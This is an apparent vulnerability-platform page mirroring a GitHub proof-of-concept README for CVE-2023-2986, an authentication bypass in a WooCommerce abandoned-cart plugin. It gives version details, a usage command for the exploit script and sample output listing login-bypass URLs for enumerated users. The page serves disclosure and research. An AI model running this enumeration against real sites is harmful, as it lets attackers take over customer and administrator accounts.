漏洞平台

POC详情： a7d56b6ba2d4191b7c08641cd2e5fbd9d1eb262b

来源

https://github.com/Ayantaker/CVE-2023-2986

关联漏洞

标题： WordPress Plugin Abandoned Cart Lite for WooCommerce 安全漏洞 (CVE-2023-2986)
描述：WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress Plugin Abandoned Cart Lite for WooCommerce 5.14.2及之前版本存在安全漏洞。攻击者利用该漏洞以abandoned the cart的用户身份登录。

描述

Proof of Concept for vulnerability CVE-2023-2986 in 'Abandoned Cart Lite for WooCommerce' Plugin in WordPress

介绍

# Original Proof of Concept for CVE-2023-2986

Proof of Concept for vulnerability CVE-2023-2986 in 'Abandoned Cart Lite for WooCommerce' Plugin in WordPress


## Related Details

- NVD Link : https://nvd.nist.gov/vuln/detail/CVE-2023-2986
- Plugin Source : https://github.com/TycheSoftwares/woocommerce-abandoned-cart/
- Vulnerable versions : <s>`version <= 5.14.2`</s> `version <= 5.15.1`
- Patched version : <s>`5.15.0`</s> `5.15.2`

### Update

- It was thought that version 5.15.0 fixes the issue but I found out that it wasn't completely fixed and same has been updated. So the actual patched version is `5.15.2`


## Vulnerability Analysis

- Keysight Blogs : https://www.keysight.com/blogs/tech/nwvs/2023/08/23/cve-2023-2986
- Medium : https://medium.com/keysight-ati/cve-2023-2986-wordpress-plugin-vulnerability-and-the-importance-of-poc-7c9c5122438b

## Usage

```bash
sudo apt-get install php-curl
php poc.php http://target_host target_port max_cart_id_to_enumerate
```

```
[*] Enumerating cart ID : 1
[+] Authentication Bypass URL for user 'victim' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=pwDHtAFjg2StEr4S2bP9YXkwVdKLqnsLjpkFGythB5ztEF8twVbXFdEP6u7kYwrc
[*] Enumerating cart ID : 2
[*] Enumerating cart ID : 3
[+] Authentication Bypass URL for user 'victim2' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=aQH9pwVjg2TWqKcFmNoipUeBKbYNb5UaEYMYP8DlCz3DqykRdzP3lQgEqID6QsoD
[*] Enumerating cart ID : 4
[+] Authentication Bypass URL for user 'user' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=XQOexwdjg2TzUjbZJgcYAeUE1p7YdPytSYL3Vkkjb+gISKD02Cpk+3Dx6SUnbe5d
[*] Enumerating cart ID : 5

```

> Entering the URL in browser will give you access to the respective users account. If the wordpress admin user himself has an entry, this will give access to the admin console leading to full compromise of the wordpress server.


## Disclaimer

This Proof of Concept (POC) has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Author is not responsible or liable for any misuse of the POC. Use responsibly.

文件快照


 [4.0K]  /data/pocs/a7d56b6ba2d4191b7c08641cd2e5fbd9d1eb262b
├── [4.0K]  libs
│   ├── [8.7K]  class-wcal-aes.php
│   └── [6.8K]  encrypt.php
├── [ 18K]  LICENSE
├── [2.7K]  poc.php
└── [2.2K]  README.md

1 directory, 5 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。